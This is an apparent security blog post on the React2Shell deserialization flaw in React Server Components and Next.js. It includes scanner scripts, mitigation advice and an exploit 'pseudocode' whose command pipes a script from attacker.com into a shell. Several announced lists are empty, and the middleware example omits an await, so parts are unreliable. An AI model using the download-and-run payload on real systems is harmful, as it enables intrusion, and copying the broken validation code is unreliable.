
By Lachlan Davidson
Last Updated: December 4, 2025
Over the past few years, the adoption of React and its associated frameworks has surged, powering everything from small web projects to large-scale enterprise applications. With this increase in popularity comes the rising concern of vulnerabilities, especially those that affect critical components of the ecosystem.
On November 29, 2025, I, Lachlan Davidson, responsibly disclosed a devastating vulnerability—React2Shell (CVE-2025-55182)—to the Meta team. This flaw, which affects server-side React implementations, particularly through the React Server Components (RSC) “Flight” protocol, was later patched by the React and Vercel teams on December 3, 2025. This blog post provides an in-depth analysis of the vulnerability from its technical nuances to its real-world exploitation, while also covering best practices for detection and mitigation.
In this post, we will cover:
Whether you are a security professional, a developer seeking to understand the risks, or an enthusiast exploring modern web technologies, this blog will guide you from beginner-level concepts to advanced exploitation techniques and proactive defenses.
The timeline of events is crucial for understanding both the risk management and rapid response that surrounded this incident:
An additional CVE, CVE-2025-66478, was assigned for Next.js due to the vendored inclusion of React, despite being technically a duplicate of CVE-2025-55182. This decision helps vendors and security teams better track dependencies that might otherwise be overlooked by traditional vulnerability scanners.
React2Shell refers to a critical vulnerability (CVE-2025-55182) in the React Server Components (RSC) environment, specifically affecting the “Flight” protocol. This vulnerability allows for unauthenticated remote code execution (RCE) on the server side due to insecure deserialization practices in the react-server package.
Key attributes of this vulnerability include:
The root cause of React2Shell lies in the way the server processes React Server Components (RSC) payloads. Specifically, the deserialization process does not adequately validate the structure of the incoming payloads. An attacker can supply tailored data that, once deserialized, leads to unintended code execution on the server.
Here is a simplified illustration of the flow:
Such a flaw is especially dangerous because the default configuration in many applications does not include the kind of input sanitization or exposure limitations that could mitigate this risk.
Next.js incorporates React as a “vendored” dependency. This means traditional dependency scanners might overlook the vulnerability if they only inspect the manifest file. To address this gap, the additional CVE-2025-66478 was introduced. Although technically a duplicate, this separate identifier helps ensure that those using Next.js are more alert to the embedded risks.
Deserialization is the process of converting data from a serialized format (such as JSON or binary data) into an executable object or data structure. Insecure deserialization occurs when:
React Server Components use the Flight protocol to exchange data between the server and client efficiently. This optimized protocol, while highly performant, inadvertently introduced a vector for exploitation due to insufficient validation in the react-server package.
When a server receives a Flight request:
Because modern Next.js deployments abstract much of this logic, developers often assume their applications are “safe by default.” Unfortunately, this vulnerability breaks that assumption.
Shortly after the public PoC was published, several automated exploitation campaigns were observed:
One notable real-world incident involved a Next.js application deployed on a Kubernetes cluster. In this case, the attacker sent a seemingly harmless HTTP request containing a crafted Flight payload that was processed by the server. Once executed, the payload allowed the attacker to:
The chain of events underscored how a vulnerability in a high-level framework like Next.js could lead to deep penetration within a cloud-native environment.
Data from Wiz Research indicates that:
These incidents highlight the importance of a comprehensive security posture that not only patches vulnerabilities but also continuously monitors for anomalous behavior.
Rapid detection and timely patching are paramount to minimizing the damage of React2Shell exploits. Below are several techniques and sample scripts that security teams can employ to identify vulnerable instances.
One of the quickest ways to determine if a deployment may be vulnerable is by sending a test HTTP request and analyzing the response for signs of insecure deserialization. The following Bash script utilizes cURL to perform a basic scan:
#!/bin/bash
# Simple Vulnerability Scanner for React2Shell (CVE-2025-55182)
# Replace <target_url> with the URL you want to scan.
TARGET="<target_url>"
PAYLOAD='{"malicious": "payload"}' # A basic placeholder payload
echo "Scanning $TARGET for React2Shell vulnerability..."
RESPONSE=$(curl -s -X POST -H "Content-Type: application/json" -d "$PAYLOAD" "$TARGET")
# Analyze the response for unusual patterns or error messages
if echo "$RESPONSE" | grep -q "Error processing Flight payload"; then
echo "Potential vulnerability detected on $TARGET"
else
echo "No obvious vulnerability found on $TARGET. However, further analysis is recommended."
fi
Note: This script is a rudimentary example. In a production environment, ensure that the payload and response analysis are carefully tailored based on updated threat intelligence and vendor advisories.
A more robust approach might involve writing a Python script that leverages libraries such as requests for HTTP requests and json for payload handling.
import requests
import json
def scan_target(target_url):
payload = {"test": "data", "action": "simulate_deserialization"}
headers = {"Content-Type": "application/json"}
print(f"Scanning {target_url} for React2Shell vulnerability...")
try:
response = requests.post(target_url, headers=headers, data=json.dumps(payload), timeout=5)
response_data = response.text
# Check for error messages or abnormal behavior in response
if "Error processing Flight payload" in response_data:
print(f"[!] Potential vulnerability detected on {target_url}")
else:
print(f"[-] No immediate vulnerability indications on {target_url}.")
except requests.exceptions.RequestException as e:
print(f"[-] An error occurred while scanning {target_url}: {e}")
if __name__ == "__main__":
targets = [
"https://example.com/api/flight",
"https://another-example.com/api/flight"
]
for target in targets:
scan_target(target)
This Python script is designed to send controlled payloads to suspected endpoints and parse the responses for signals of insecure deserialization. Enhance the logic as more details on valid vs. invalid responses become available.
For security professionals and penetration testers, understanding the advanced techniques behind exploitation is key to creating effective defensive strategies.
When developing a real exploit, several factors must be taken into account:
A simplified pseudocode snippet for an in-depth exploit could look like:
// Pseudocode demonstrating payload structure for exploitation
const maliciousPayload = {
component: "ShellExec",
args: {
// Obfuscated commands to evade simple pattern detection
command: "bash -c 'curl -fsSL http://attacker.com/malware.sh | sh'",
},
_meta: {
timestamp: Date.now(),
nonce: Math.random().toString(36).substring(2),
}
};
// The payload is then serialized and embedded into the Flight protocol
const serializedPayload = JSON.stringify(maliciousPayload);
sendToServer(serializedPayload);
Disclaimer: The above pseudocode is for educational purposes only. Unauthorized exploitation of systems is illegal and unethical.
After a successful exploitation, threat actors might:
Defenders should adopt comprehensive logging and incident response strategies to quickly detect such activities.
Since the vulnerability is based on insecure deserialization within the RSC Flight protocol, false positives can occur if scanners detect unrelated insecure functionalities that developers might have explicitly enabled. For example:
These functions might be used intentionally in some applications, and their presence does not alone indicate a vulnerable state. True exploitation of React2Shell does not rely on these dangerous functions being accessible on the client side. Instead, it leverages the automatic management of server functions by Next.js, meaning the vulnerability exists regardless of whether these functions are explicitly exposed.
Security teams must remain vigilant by:
Given the immediate risks posed by React2Shell, it is crucial to take swift action if your applications are running in vulnerable environments.
Here is an example of how developers might configure middleware in a Next.js project to add an additional layer of input validation:
// Example middleware for Next.js - enhance input sanitization
import { NextResponse } from 'next/server';
export function middleware(request) {
// Only apply to the Flight endpoint
if (request.nextUrl.pathname.startsWith('/api/flight')) {
try {
const body = request.json();
// Perform additional validation on the payload
if (!body || typeof body !== 'object' || !body.component) {
return new NextResponse('Invalid payload format', { status: 400 });
}
} catch (err) {
return new NextResponse('Error processing request', { status: 400 });
}
}
return NextResponse.next();
}
React2Shell (CVE-2025-55182) is a stark reminder that even widely adopted and trusted frameworks like React and Next.js are not immune to high-severity vulnerabilities. This vulnerability, rooted in insecure deserialization within the RSC “Flight” protocol, has far-reaching implications due to its critical nature, ease of exploitation, and prevalence in default application configurations.
Key takeaways include:
By understanding both the technical details of React2Shell and the contextual threat landscape, developers and security professionals can better fortify their applications against this critical vulnerability.
This comprehensive guide should empower you with the understanding and tools needed to address React2Shell in its entirety—from technical details of the vulnerability to practical methods for detection and mitigation. Always stay updated with official advisories and continuously refine your security posture as new intelligence emerges.
Happy secure coding!
If you found this content valuable, imagine what you could achieve with our comprehensive 47-week elite training program. Join 1,200+ students who've transformed their careers with Unit 8200 techniques.